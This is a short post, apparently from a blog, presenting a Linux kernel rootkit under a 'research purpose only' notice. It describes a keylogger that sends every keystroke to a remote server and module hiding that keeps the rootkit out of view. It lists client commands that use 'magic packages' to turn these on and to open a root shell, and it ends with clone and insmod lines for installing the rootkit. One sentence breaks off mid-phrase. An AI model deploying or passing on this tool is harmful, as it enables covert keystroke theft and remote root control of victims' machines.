NOTICE : This POST for Research Purpose Only!
In the following we want to explore how to make a linux kernel rootkit. As the definition of a rootkit stats it should run as root and should be hard to detect for users. To give the rootkit real value it has to do something. We decided to go with two very common usecases when it comes to
This section deals about keylogging in linux kernel. Keylogging describes the process of intercepting all input keys from a keyboard. Our rootkit intercept all keys and send them to a server. It is possible to activate and deactivate the keylogging function. To implement a keylogger in the linux kernel you must register a keyboard notifier.
Rootkit client Menu:
usage: ./rootkit_client.py [-a key] [-d key] [-h <host>]
-a key sends a magic package to the rootkit and activates the keylogger and listens
-d key sends a magic package to the rootkit and deactivates the keylogger
-a hide sends a magic package to the rootkit and activates modul hiding
-d hide sends a magic package to the rootkit and deactivates modul hiding
-a root sends a magic package to the rootkit and activate the root shell
-h <host> the ip for the host where the rootkit is running
git clone https://github.com/soad003/rootkit
insmod rootkt.ko (for load module on server)
rmmod rootkt.ko (for Unload module on server)
Source : https://github.com/soad003